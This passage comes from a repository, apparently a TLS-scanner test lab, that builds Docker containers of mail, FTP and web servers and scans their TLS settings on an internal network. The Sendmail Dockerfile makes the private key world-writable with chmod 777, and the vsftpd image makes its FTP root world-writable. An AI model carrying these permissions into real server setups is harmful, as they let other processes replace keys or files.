"auxprop", "pwcheck" and 94 | # "alwaystrue". They are tried in order, you can specify more than one, 95 | # separated by spaces. 96 | sasl_pwcheck_method: saslauthd 97 | 98 | # If enabled, the SASL library will automatically create authentication 99 | # secrets when given a plaintext password. 
Refer to SASL documentation 100 | sasl_auto_transition: no 101 | 102 | ################################################################### 103 | ## SSL/TLS Options 104 | ################################################################### 105 | 106 | # File containing the global certificate used for ALL services (imap, 107 | # pop3, lmtp, sieve) 108 | tls_server_cert: /etc/ssl/cert-data/tls-server-chain.crt 109 | 110 | # File containing the private key belonging to the global server 111 | # certificate. 112 | tls_server_key: /etc/ssl/cert-data/tls-server.key 113 | 114 | 115 | # File containing one or more Certificate Authority (CA) certificates. 116 | #tls_client_ca_file: /etc/ssl/certs/cyrus-imapd-ca.pem 117 | 118 | # Path to directory with certificates of CAs. 119 | tls_client_ca_dir: /etc/ssl/certs 120 | 121 | # The length of time (in minutes) that a TLS session will be cached for 122 | # later reuse. The maximum value is 1440 (24 hours), the default. A 123 | # value of 0 will disable session caching. 
124 | tls_session_timeout: 1440 125 | 126 | tls_ciphers: ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384 127 | tls_required: 1 128 | tls_prefer_server_ciphers: 1 129 | tls_versions: tls1_2 tls1_3 130 | servername: tls-server 131 | -------------------------------------------------------------------------------- /evaluation-servers/cyrus/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-servers/dovecot/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tls-baseimagedebian 2 | RUN apt-get update && apt-get install -y dovecot-imapd dovecot-pop3d 3 | RUN cp /etc/ssl/cert-data/tls-server.com-chain.crt /etc/dovecot/private/dovecot.pem 4 | RUN cp /etc/ssl/cert-data/tls-server.com.key /etc/dovecot/private/dovecot.key 5 | RUN echo "ssl_min_protocol = TLSv1.2" >> /etc/dovecot/conf.d/10-ssl.conf 6 | CMD ["dovecot", "-F"] -------------------------------------------------------------------------------- /evaluation-servers/dovecot/build.sh: -------------------------------------------------------------------------------- 1 | docker build . 
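-t tls-dovecot 2 | -------------------------------------------------------------------------------- /evaluation-servers/dovecot/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | dovecot: 8 | image: tls-dovecot 9 | scanner: 10 | image: tlsscanner 11 | depends_on: 12 | - dovecot 13 | command: [ "-connect", "dovecot:993", "-server_name", "tls-server.com", "-scanDetail", "QUICK"] -------------------------------------------------------------------------------- /evaluation-servers/dovecot/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-servers/exim/Dockerfile: --------------------------------------------------------------------------------
FROM tls-baseimage
RUN apk add exim
ADD exim.conf /etc/exim/exim.conf

# exim runs unprivileged (USER exim below) and has to read the test
# certificate chain and key. Give it ownership of the key and read-only
# access instead of chmod 777 on both files: the chain is public and can
# stay world-readable, while a world-writable key can be replaced by any
# other process in the container.
RUN chmod 644 /etc/ssl/cert-data/tls-server.com-chain.crt
RUN chown exim /etc/ssl/cert-data/tls-server.com.key && chmod 400 /etc/ssl/cert-data/tls-server.com.key

USER exim
#CMD ["exim", "-bd", "-d-all+pid", "-q30m"]
ENTRYPOINT ["exim"]
CMD ["-bd", "-v", "-oP", "/dev/null"]
-------------------------------------------------------------------------------- /evaluation-servers/exim/build.sh: -------------------------------------------------------------------------------- 1 | docker build . 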
-t tls-exim 2 | -------------------------------------------------------------------------------- /evaluation-servers/exim/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | exim: 8 | image: tls-exim 9 | hostname: tls-exim 10 | scanner: 11 | image: tlsscanner 12 | depends_on: 13 | - exim 14 | command: [ "-connect", "exim:465", "-server_name", "tls-server.com", "-scanDetail", "QUICK"] -------------------------------------------------------------------------------- /evaluation-servers/exim/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-servers/filezilla-server/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tls-baseimage 2 | 3 | 4 | # RUN cat /etc/ssl/cert-data/tls-server.com.key >> /etc/ssl/private/pure-ftpd.pem 5 | # RUN cat /etc/ssl/cert-data/tls-server.com-chain.crt >> /etc/ssl/private/pure-ftpd.pem 6 | RUN apk add gnutls-dev wxgtk-dev pugixml-dev libexecinfo-dev 7 | 8 | ARG LIBVERSION=0.34.2 9 | WORKDIR /build 10 | RUN wget https://download.filezilla-project.org/libfilezilla/libfilezilla-${LIBVERSION}.tar.bz2 11 | RUN tar -xvf libfilezilla-${LIBVERSION}.tar.bz2 12 | WORKDIR /build/libfilezilla-${LIBVERSION} 13 | RUN ./configure --prefix=/usr 14 | RUN make 15 | RUN make install 16 | #RUN mv lib/.libs/libfilezilla.a /usr/lib/ 17 | 18 | ARG VERSION=1.1.0 19 | WORKDIR /build 20 | RUN wget https://download.filezilla-project.org/server/FileZilla_Server_${VERSION}_src.tar.bz2 21 | RUN tar -xvf FileZilla_Server_${VERSION}_src.tar.bz2 22 | WORKDIR /build/filezilla-server-${VERSION} 23 | RUN ./configure --prefix=/usr 24 | RUN make 25 | RUN mv src/server/filezilla-server /bin/ 26 
| 27 | CMD ["filezilla-server"] -------------------------------------------------------------------------------- /evaluation-servers/filezilla-server/build.sh: -------------------------------------------------------------------------------- 1 | docker build . -t tls-filezillaserver -------------------------------------------------------------------------------- /evaluation-servers/filezilla-server/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | filezillaserver: 8 | image: tls-filezillaserver 9 | scanner: 10 | image: tlsscanner 11 | depends_on: 12 | - filezillaserver 13 | command: [ "-connect", "filezillaserver:21", "-server_name", "tls-server.com", "-starttls", "ftp", "-scanDetail", "QUICK"] -------------------------------------------------------------------------------- /evaluation-servers/filezilla-server/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-servers/lighttpd/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tls-openssl 2 | 3 | 4 | # RUN cat /etc/ssl/cert-data/tls-server.com.key >> /etc/ssl/private/pure-ftpd.pem 5 | # RUN cat /etc/ssl/cert-data/tls-server.com-chain.crt >> /etc/ssl/private/pure-ftpd.pem 6 | RUN apk add pcre-dev zlib-dev bsd-compat-headers 7 | 8 | ARG VERSION=1.4.63 9 | WORKDIR /build 10 | RUN wget https://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-${VERSION}.tar.gz 11 | RUN tar -xvf lighttpd-${VERSION}.tar.gz 12 | WORKDIR /build/lighttpd-${VERSION} 13 | RUN ./autogen.sh 14 | RUN ./configure -C --with-openssl 15 | RUN make check 16 | RUN make install 17 | 18 | ADD lighttpd.conf /etc/lighttpd.conf 19 | 20 | CMD ["lighttpd", "-D", 
"-f", "/etc/lighttpd.conf"] -------------------------------------------------------------------------------- /evaluation-servers/lighttpd/Dockerfile-mbedtls: -------------------------------------------------------------------------------- 1 | FROM tls-baseimage 2 | 3 | 4 | # RUN cat /etc/ssl/cert-data/tls-server.com.key >> /etc/ssl/private/pure-ftpd.pem 5 | # RUN cat /etc/ssl/cert-data/tls-server.com-chain.crt >> /etc/ssl/private/pure-ftpd.pem 6 | RUN apk add mbedtls-dev pcre-dev zlib-dev bsd-compat-headers 7 | 8 | ARG VERSION=1.4.63 9 | WORKDIR /build 10 | RUN wget https://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-${VERSION}.tar.gz 11 | RUN tar -xvf lighttpd-${VERSION}.tar.gz 12 | WORKDIR /build/lighttpd-${VERSION} 13 | RUN ./autogen.sh 14 | RUN ./configure -C --with-mbedtls 15 | RUN make check 16 | RUN make install 17 | 18 | ADD lighttpd-mbedtls.conf /etc/lighttpd.conf 19 | 20 | CMD ["lighttpd", "-D", "-f", "/etc/lighttpd.conf"] -------------------------------------------------------------------------------- /evaluation-servers/lighttpd/build.sh: -------------------------------------------------------------------------------- 1 | docker build . -t tls-lighttpd-openssl 2 | docker build . 
-t tls-lighttpd-mbedtls -f Dockerfile-mbedtls -------------------------------------------------------------------------------- /evaluation-servers/lighttpd/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | lighttpd-openssl: 8 | image: tls-lighttpd-openssl 9 | lighttpd-mbedtls: 10 | image: tls-lighttpd-mbedtls 11 | scanner: 12 | image: tlsscanner 13 | depends_on: 14 | - lighttpd-openssl 15 | command: [ "-connect", "lighttpd-openssl:443", "-server_name", "tls-server.com", "-scanDetail", "QUICK" ] 16 | scanner2: 17 | image: tlsscanner 18 | depends_on: 19 | - lighttpd-mbedtls 20 | command: [ "-connect", "lighttpd-mbedtls:443", "-server_name", "tls-server.com", "-scanDetail", "QUICK" ] -------------------------------------------------------------------------------- /evaluation-servers/lighttpd/lighttpd-mbedtls.conf: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Default lighttpd.conf for Gentoo. 3 | # $Header: /var/cvsroot/gentoo-x86/www-servers/lighttpd/files/conf/lighttpd.conf,v 1.3 2005/09/01 14:22:35 ka0ttic Exp $ 4 | ############################################################################### 5 | 6 | # {{{ variables 7 | var.basedir = "/var/www/localhost" 8 | #var.logdir = "/var/log/lighttpd" 9 | var.statedir = "/var/lib/lighttpd" 10 | # }}} 11 | 12 | # {{{ modules 13 | # At the very least, mod_access and mod_accesslog should be enabled. 14 | # All other modules should only be loaded if necessary. 15 | # NOTE: the order of modules is important. 
16 | server.modules = ( 17 | 18 | "mod_access", 19 | "mod_mbedtls", 20 | 21 | "mod_accesslog" 22 | ) 23 | 24 | server.document-root = var.basedir + "/htdocs" 25 | server.pid-file = "/run/lighttpd.pid" 26 | 27 | 28 | server.indexfiles = ("index.php", "index.html", 29 | "index.htm", "default.htm") 30 | 31 | server.follow-symlink = "enable" 32 | 33 | static-file.exclude-extensions = (".php", ".pl", ".cgi", ".fcgi") 34 | 35 | url.access-deny = ("~", ".inc") 36 | 37 | $SERVER["socket"] == ":443" { 38 | ssl.engine = "enable" 39 | ssl.pemfile = "/etc/ssl/cert-data/tls-server.com-chain.crt" 40 | ssl.privkey = "/etc/ssl/cert-data/tls-server.com.key" 41 | ssl.cipher-list = "EECDH+AESGCM:AES256+EECDH:CHACHA20:!SHA1:!SHA256:!SHA384" 42 | $HTTP["host"] == "tls-server.com" { 43 | ssl.pemfile = "/etc/ssl/cert-data/tls-server.com-chain.crt" 44 | ssl.privkey = "/etc/ssl/cert-data/tls-server.com.key" 45 | } 46 | } 47 | 48 | 49 | 50 | 51 | #ssl.openssl.ssl-conf-cmd = ("MinProtocol" => "TLSv1.2") 52 | #ssl.openssl.ssl-conf-cmd += ("Options" => "-ServerPreference") 53 | #ssl.openssl.ssl-conf-cmd += ("CipherString" => "ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384") -------------------------------------------------------------------------------- /evaluation-servers/lighttpd/lighttpd.conf: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Default lighttpd.conf for Gentoo. 
3 | # $Header: /var/cvsroot/gentoo-x86/www-servers/lighttpd/files/conf/lighttpd.conf,v 1.3 2005/09/01 14:22:35 ka0ttic Exp $ 4 | ############################################################################### 5 | 6 | # {{{ variables 7 | var.basedir = "/var/www/localhost" 8 | #var.logdir = "/var/log/lighttpd" 9 | var.statedir = "/var/lib/lighttpd" 10 | # }}} 11 | 12 | # {{{ modules 13 | # At the very least, mod_access and mod_accesslog should be enabled. 14 | # All other modules should only be loaded if necessary. 15 | # NOTE: the order of modules is important. 16 | server.modules = ( 17 | 18 | "mod_access", 19 | "mod_openssl", 20 | 21 | "mod_accesslog" 22 | ) 23 | 24 | server.document-root = var.basedir + "/htdocs" 25 | server.pid-file = "/run/lighttpd.pid" 26 | 27 | 28 | server.indexfiles = ("index.php", "index.html", 29 | "index.htm", "default.htm") 30 | 31 | server.follow-symlink = "enable" 32 | 33 | static-file.exclude-extensions = (".php", ".pl", ".cgi", ".fcgi") 34 | 35 | url.access-deny = ("~", ".inc") 36 | 37 | $SERVER["socket"] == ":443" { 38 | ssl.engine = "enable" 39 | ssl.pemfile = "/etc/ssl/cert-data/tls-server.com-chain.crt" 40 | ssl.privkey = "/etc/ssl/cert-data/tls-server.com.key" 41 | ssl.cipher-list = "EECDH+AESGCM:AES256+EECDH:CHACHA20:!SHA1:!SHA256:!SHA384" 42 | $HTTP["host"] == "tls-server.com" { 43 | ssl.pemfile = "/etc/ssl/cert-data/tls-server.com-chain.crt" 44 | ssl.privkey = "/etc/ssl/cert-data/tls-server.com.key" 45 | } 46 | } 47 | 48 | 49 | #ssl.openssl.ssl-conf-cmd = ("MinProtocol" => "TLSv1.2") 50 | #ssl.openssl.ssl-conf-cmd += ("Options" => "-ServerPreference") 51 | #ssl.openssl.ssl-conf-cmd += ("CipherString" => "ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384") -------------------------------------------------------------------------------- 
/evaluation-servers/lighttpd/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-servers/nginx/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tls-baseimage as tls-nginx 2 | ARG VERSION=1.21.4 3 | RUN apk add pcre-dev openssl-dev 4 | WORKDIR /build 5 | RUN wget http://nginx.org/download/nginx-${VERSION}.tar.gz 6 | RUN tar -xvf nginx-${VERSION}.tar.gz 7 | WORKDIR /build/nginx-${VERSION} 8 | #ADD patch.diff /build/nginx-${VERSION}/patch.diff 9 | #RUN patch src/http/modules/ngx_http_ssl_module.c 10 | RUN mkdir /usr/local/nginx 11 | RUN mkdir /usr/local/nginx/logs 12 | RUN ./configure --conf-path=/etc/nginx.conf --with-http_ssl_module --without-http_gzip_module --with-http_v2_module 13 | RUN make 14 | ADD nginx.conf /etc/nginx.conf 15 | RUN mv objs/nginx /usr/bin/nginx 16 | CMD ["nginx", "-g", "daemon off;"] 17 | -------------------------------------------------------------------------------- /evaluation-servers/nginx/build.sh: -------------------------------------------------------------------------------- 1 | docker build . 
-t tls-nginx 2 | -------------------------------------------------------------------------------- /evaluation-servers/nginx/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | nginx: 8 | image: tls-nginx 9 | scanner: 10 | image: tlsscanner 11 | depends_on: 12 | - nginx 13 | command: [ "-connect", "nginx:4433", "-server_name", "tls-server.com", "-scanDetail", "QUICK"] 14 | -------------------------------------------------------------------------------- /evaluation-servers/nginx/nginx.conf: -------------------------------------------------------------------------------- 1 | worker_processes auto; 2 | 3 | events { 4 | worker_connections 1024; 5 | } 6 | 7 | http { 8 | server { 9 | listen 4433 ssl http2; 10 | server_name tls-server.com; 11 | 12 | ssl_certificate /etc/ssl/cert-data/tls-server.com-chain.crt; 13 | ssl_certificate_key /etc/ssl/cert-data/tls-server.com.key; 14 | ssl_protocols TLSv1.2 TLSv1.3; 15 | 16 | location / { 17 | return 404; 18 | } 19 | } 20 | } -------------------------------------------------------------------------------- /evaluation-servers/nginx/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-servers/opensmtpd/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tls-baseimagedebian 2 | ARG DEBIAN_FRONTEND=noninteractive 3 | RUN apt-get update && apt-get install -yq opensmtpd 4 | ADD smtpd.conf /etc/ 5 | RUN chmod 600 /etc/ssl/cert-data/* 6 | CMD ["smtpd", "-d"] -------------------------------------------------------------------------------- /evaluation-servers/opensmtpd/build.sh: -------------------------------------------------------------------------------- 
1 | docker build . -t tls-opensmtpd 2 | -------------------------------------------------------------------------------- /evaluation-servers/opensmtpd/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | opensmtpd: 8 | image: tls-opensmtpd 9 | scanner: 10 | image: tlsscanner 11 | depends_on: 12 | - opensmtpd 13 | command: [ "-connect", "opensmtpd:465", "-server_name", "tls-server.com", "-scanDetail", "QUICK"] -------------------------------------------------------------------------------- /evaluation-servers/opensmtpd/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-servers/opensmtpd/smtpd.conf: -------------------------------------------------------------------------------- 1 | # $OpenBSD: smtpd.conf,v 1.10 2018/05/24 11:40:17 gilles Exp $ 2 | 3 | # This is the smtpd server system-wide configuration file. 4 | # See smtpd.conf(5) for more information. 
5 | 6 | table aliases file:/etc/aliases 7 | 8 | pki tls-server.com cert "/etc/ssl/cert-data/tls-server.com-chain.crt" 9 | pki tls-server.com key "/etc/ssl/cert-data/tls-server.com.key" 10 | 11 | # To accept external mail, replace with: listen on all 12 | # 13 | #listen on 0.0.0.0 smtps 14 | 15 | listen on 0.0.0.0 tls pki tls-server.com 16 | listen on 0.0.0.0 port 465 smtps pki tls-server.com 17 | listen on 0.0.0.0 port 587 tls-require pki tls-server.com 18 | 19 | action "local" maildir alias 20 | action "relay" relay 21 | 22 | # Uncomment the following to accept external mail for domain "example.org" 23 | # 24 | # match from any for domain "example.org" action "local" 25 | match for local action "local" 26 | match from local for any action "relay" -------------------------------------------------------------------------------- /evaluation-servers/postfix/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tls-baseimage as tls-apache 2 | RUN apk add postfix 3 | COPY main.cf /etc/postfix/ 4 | COPY master.cf /etc/postfix/ 5 | 6 | CMD ["/usr/sbin/postfix", "start-fg"] -------------------------------------------------------------------------------- /evaluation-servers/postfix/build.sh: -------------------------------------------------------------------------------- 1 | docker build . 
-t tls-postfix 2 | -------------------------------------------------------------------------------- /evaluation-servers/postfix/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | postfix: 8 | image: tls-postfix 9 | scanner: 10 | image: tlsscanner 11 | depends_on: 12 | - postfix 13 | command: [ "-connect", "postfix:465", "-server_name", "tls-server.com", "-starttls", "SMTP", "-scanDetail", "QUICK"] -------------------------------------------------------------------------------- /evaluation-servers/postfix/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-servers/proftpd/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tls-baseimage 2 | ARG VERSION=1.3.8rc2 3 | ARG TLS_SERVER_NAME=tls-server.com 4 | RUN apk add openssl-dev 5 | WORKDIR /build 6 | RUN wget https://github.com/proftpd/proftpd/archive/refs/tags/v${VERSION}.tar.gz 7 | RUN tar -xvf v${VERSION}.tar.gz 8 | WORKDIR /build/proftpd-${VERSION} 9 | RUN ./configure --with-modules=mod_tls --with-virtualhosts 10 | RUN make 11 | RUN mv proftpd /bin/ 12 | 13 | #fix errors on start 14 | RUN mkdir /usr/local/var/ 15 | 16 | RUN echo "tls-server.com" > /etc/hostname 17 | RUN echo "tls-server.com 127.0.0.1" > /etc/hosts 18 | 19 | ADD proftpd.conf /etc/proftpd.conf 20 | 21 | 22 | CMD ["proftpd", "-d", "10", "-n" , "-c" , "/etc/proftpd.conf"] -------------------------------------------------------------------------------- /evaluation-servers/proftpd/build.sh: -------------------------------------------------------------------------------- 1 | docker build . 
-t tls-proftpd -------------------------------------------------------------------------------- /evaluation-servers/proftpd/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | tls-server.com: 8 | image: tls-proftpd 9 | scanner: 10 | image: tlsscanner 11 | depends_on: 12 | - tls-server.com 13 | command: [ "-connect", "tls-server.com:21", "-server_name", "tls-server.com", "-starttls", "ftp", "-scanDetail", "QUICK"] -------------------------------------------------------------------------------- /evaluation-servers/proftpd/proftpd.conf: -------------------------------------------------------------------------------- 1 | ScoreboardFile /dev/null 2 | ServerType standalone 3 | UseReverseDNS off 4 | 5 | TLSEngine on 6 | TLSLog /usr/local/var/tls.log 7 | TLSProtocol TLSv1.2 8 | TLSRequired on 9 | TLSRSACertificateFile /etc/ssl/cert-data/tls-server.com-chain.crt 10 | TLSRSACertificateKeyFile /etc/ssl/cert-data/tls-server.com.key 11 | TLSVerifyClient off 12 | TLSRenegotiate none 13 | TLSNextProtocol on 14 | TLSOptions StdEnvVars 15 | 16 | # This is a basic ProFTPD configuration file (rename it to 17 | # 'proftpd.conf' for actual use. It establishes a single server 18 | # and a single anonymous login. It assumes that you have a user/group 19 | # "nobody" and "ftp" for normal operation and anon. 20 | 21 | ServerName "tls-server.com" 22 | 23 | DefaultServer on 24 | 25 | # Port 21 is the standard FTP port. 26 | Port 21 27 | 28 | # Bar use of SITE CHMOD by default 29 | 30 | DenyAll 31 | 32 | 33 | # A basic anonymous configuration, no upload directories. If you do not 34 | # want anonymous users, simply delete this entire section. 
35 | 36 | User ftp 37 | Group ftp 38 | 39 | # We want clients to be able to login with "anonymous" as well as "ftp" 40 | UserAlias anonymous ftp 41 | 42 | # Limit the maximum number of anonymous logins 43 | MaxClients 10 44 | 45 | # We want 'welcome.msg' displayed at login, and '.message' displayed 46 | # in each newly chdired directory. 47 | DisplayLogin welcome.msg 48 | DisplayChdir .message 49 | 50 | # Limit WRITE everywhere in the anonymous chroot 51 | 52 | DenyAll 53 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /evaluation-servers/proftpd/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-servers/pure-ftpd/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tls-baseimage 2 | ARG VERSION=1.0.49 3 | RUN apk add openssl-dev 4 | WORKDIR /build 5 | RUN wget https://github.com/jedisct1/pure-ftpd/releases/download/${VERSION}/pure-ftpd-${VERSION}.tar.gz 6 | RUN tar -xvf pure-ftpd-${VERSION}.tar.gz 7 | WORKDIR /build/pure-ftpd-${VERSION} 8 | RUN ./configure --with-tls --without-capabilities 9 | RUN make 10 | RUN mv src/pure-ftpd /bin/ 11 | 12 | RUN mkdir /etc/ssl/private 13 | 14 | RUN cat /etc/ssl/cert-data/tls-server.com.key >> /etc/ssl/private/pure-ftpd.pem 15 | RUN cat /etc/ssl/cert-data/tls-server.com-chain.crt >> /etc/ssl/private/pure-ftpd.pem 16 | 17 | CMD ["pure-ftpd", "-Y" , "2"] -------------------------------------------------------------------------------- /evaluation-servers/pure-ftpd/build.sh: -------------------------------------------------------------------------------- 1 | docker build . 
-t tls-pureftpd -------------------------------------------------------------------------------- /evaluation-servers/pure-ftpd/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | pureftpd: 8 | image: tls-pureftpd 9 | scanner: 10 | image: tlsscanner 11 | depends_on: 12 | - pureftpd 13 | command: [ "-connect", "pureftpd:21", "-server_name", "tls-server.com", "-starttls", "ftp", "-scanDetail", "QUICK"] -------------------------------------------------------------------------------- /evaluation-servers/pure-ftpd/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-servers/sendmail/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tls-baseimagedebian 2 | 3 | RUN apt-get update && apt-get install -yq sendmail openssl libsasl2-2 sasl2-bin 4 | 5 | RUN echo "tls-server.com" >> /etc/hostname 6 | RUN echo "tls-server.com 127.0.0.1" >> /etc/hosts 7 | 8 | RUN echo "include(\`/etc/mail/tls/starttls.m4')dnl" >> /etc/mail/sendmail.mc 9 | RUN echo "include(\`/etc/mail/tls/starttls.m4')dnl" >> /etc/mail/submit.mc 10 | 11 | RUN echo "define(\`confCACERT_PATH', \`/etc/ssl/cert-data/')dnl" >> /etc/mail/sendmail.mc 12 | RUN echo "define(\`confLOG_LEVEL', \`14')" >> /etc/mail/sendmail.mc 13 | 14 | RUN echo "define(\`SMART_HOST', \`tls-server.com')dnl" >> /etc/mail/sendmail.mc 15 | 16 | RUN echo "define(\`confSERVER_CERT', \`/etc/ssl/cert-data/tls-server.com-chain.crt')dnl" >> /etc/mail/sendmail.mc 17 | RUN echo "define(\`confSERVER_KEY', \`/etc/ssl/cert-data/tls-server.com.key')dnl" >> /etc/mail/sendmail.mc 18 | RUN echo "define(\`confCLIENT_CERT', \`/etc/ssl/cert-data/tls-server.com-chain.crt')dnl" >> 
/etc/mail/sendmail.mc 19 | RUN echo "define(\`confCLIENT_KEY', \`/etc/ssl/cert-data/tls-server.com.key')dnl" >> /etc/mail/sendmail.mc 20 | 21 | RUN echo "GreetPause:192.16 0" >> /etc/mail/access 22 | RUN echo "ClientRate:172.16 0" >> /etc/mail/access 23 | RUN echo "GreetPause:172.16 0" >> /etc/mail/access 24 | 25 | RUN sed -i 's/127.0.0.1/0.0.0.0/' /etc/mail/sendmail.mc 26 | 27 | RUN chmod 600 /etc/ssl/cert-data/* 28 | 29 | RUN yes 'y' | sendmailconfig 30 | 31 | RUN chmod 777 /etc/ssl/cert-data/tls-server.com-chain.crt 32 | RUN chmod 777 /etc/ssl/cert-data/tls-server.com.key 33 | 34 | USER sendmail 35 | #CMD ["exim", "-bd", "-d-all+pid", "-q30m"] 36 | ADD start.sh /root/ 37 | RUN chmod +x /root/start.sh 38 | CMD ["/root/start.sh"] 39 | #CMD ["sendmail", "-bD", "-d0.14"] -------------------------------------------------------------------------------- /evaluation-servers/sendmail/build.sh: -------------------------------------------------------------------------------- 1 | docker build . -t tls-sendmail 2 | -------------------------------------------------------------------------------- /evaluation-servers/sendmail/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | tls-sendmail: 8 | image: tls-sendmail 9 | hostname: tls-server.com 10 | container_name: tls-server.com 11 | scanner: 12 | image: tlsscanner 13 | depends_on: 14 | - tls-sendmail 15 | command: [ "-connect", "tls-server.com:25", "-server_name", "tls-server.com", "-starttls", "SMTP", "-scanDetail", "QUICK"] 16 | restart: always -------------------------------------------------------------------------------- /evaluation-servers/sendmail/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --remove-orphans 3 | 
-------------------------------------------------------------------------------- /evaluation-servers/sendmail/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # /etc/init.d/sendmail start 3 | # echo Started sendmail 4 | # 5 | 6 | cat /etc/hostname 7 | echo "tls-server" > /etc/hostname 8 | echo "127.0.0.1 tls-server.com tls-server localdev localhost" > /etc/hosts 9 | 10 | touch /var/log/mail.info 11 | sendmail -bD -d0.14 -------------------------------------------------------------------------------- /evaluation-servers/vsftpd/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tls-baseimage 2 | ARG VERSION=3.0.5 3 | RUN apk add vsftpd 4 | #RUN apk add openssl-dev 5 | #WORKDIR /build 6 | #RUN wget https://security.appspot.com/downloads/vsftpd-${VERSION}.tar.gz 7 | #RUN tar -xvf vsftpd-${VERSION}.tar.gz 8 | #WORKDIR /build/vsftpd-${VERSION} 9 | #RUN ./configure --with-modules=mod_tls --with-virtualhosts 10 | #RUN make 11 | #RUN mv proftpd /bin/ 12 | 13 | RUN mkdir /var/ftp 14 | RUN chmod 777 /var/ftp 15 | 16 | RUN echo "tls-server.com" > /etc/hostname 17 | RUN echo "tls-server.com 127.0.0.1" > /etc/hosts 18 | 19 | ADD vsftpd.conf /etc/vsftpd/vsftpd.conf 20 | 21 | ADD start.sh /root/ 22 | RUN chmod +x /root/start.sh 23 | CMD ["/root/start.sh"] 24 | 25 | #CMD ["/usr/sbin/vsftpd", "/etc/vsftpd/vsftpd.conf"] -------------------------------------------------------------------------------- /evaluation-servers/vsftpd/build.sh: -------------------------------------------------------------------------------- 1 | docker build . 
